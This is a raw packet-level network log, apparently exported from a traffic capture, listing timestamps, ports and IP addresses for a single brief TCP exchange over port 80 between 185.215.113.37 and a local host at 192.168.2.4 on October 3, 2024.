Oct 3, 2024 18:38:23.326369047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326384068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326390982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326395035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326406002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326414108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326421976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326435089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326436043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326452971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326459885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326469898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326478004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326486111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326502085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326503038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326518059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326531887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326531887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326545954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326548100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326564074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326577902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326585054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326594114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.326608896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326617956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326642036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.327259064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.327275038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.327289104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.327308893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.327310085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.327317953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.327327013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.327348948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.327358007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.327374935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.327454090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.327481985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.327492952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.327497959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.327529907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.327538013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328212023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328227043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328241110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328262091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328263998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328277111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328289032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328294039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328299999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328309059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328324080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328325033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328337908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328339100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328355074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328367949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328370094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328386068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328386068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328402996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328414917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328419924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328425884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328435898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328452110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.328459024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328481913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.328506947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329279900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329296112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329309940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329324007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329329014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329339027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329339027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329351902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329355955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329371929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329380989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329386950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329399109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329404116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329421043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329422951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329436064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329447985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329452038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329467058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329472065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329483032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329493046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329498053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329514980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329515934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329530954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.329540968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329555035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.329586983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330229044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330245018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330259085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330275059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330277920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330288887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330307961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330343962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330375910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330389977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330404997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330427885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330434084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330444098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330457926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330457926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330475092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330488920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330490112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330506086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330522060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330533028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330557108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330862999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330878019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330893040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330907106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330924034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330944061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330945015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330960989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330976009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.330987930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.330990076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331000090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331006050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331013918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331022978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331038952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331053019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331062078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331491947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331506968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331521034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331536055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331542969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331553936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331562996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331568956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331584930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331585884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331600904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331609964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331615925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331630945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331629992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331645966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331654072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331661940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331675053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331677914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331692934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331696987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331713915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.331716061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331743002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.331753016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332264900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332278967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332293987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332308054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332309961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332324028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332335949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332359076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332361937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332376957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332379103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332395077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332411051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332418919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332427979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332442999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332459927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332468987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332694054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332709074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332724094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332739115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332740068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332755089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332755089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332767963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332787037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332796097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332859039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332875013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332890034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332902908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332907915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332915068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332923889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332938910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332940102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332953930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332957029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332969904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.332977057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.332986116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333002090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333002090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333019018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333025932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333036900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333048105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333051920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333069086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333079100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333089113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333837032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333852053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333865881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333880901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333882093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333899021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333908081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333913088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333923101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333930016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333945036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333956003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333961010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333977938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.333981991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.333995104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334005117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334011078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334016085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334026098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334042072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334043026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334055901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334060907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334076881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334089994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334089994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334093094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334105968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334109068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334120035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334125042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334136963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334148884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334167004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334695101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334711075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334724903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334739923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334745884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334745884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334753990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334769011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334770918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334779978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334784985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334796906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334798098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334801912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334819078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334830046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334834099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334847927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334851980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.334871054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334882021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.334896088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.335155010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.335170031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.335210085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.380839109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.380862951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.380878925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.380930901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.380958080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.380974054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.380990028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381005049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381020069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381031990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381051064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381073952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381211996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381227016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381241083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381257057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381258011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381269932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381272078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381280899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381289005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381298065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381305933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381313086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381321907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381326914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381339073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381345034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381356955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381375074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381572008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381587029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381601095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381614923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381624937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381630898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381645918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381647110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381670952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381680012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381692886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381696939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381712914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381727934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381738901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381742954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.381762981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.381786108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.391557932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391623974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391659975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.391694069 CEST	80	49730	185.215.113.37	192.168.2.4
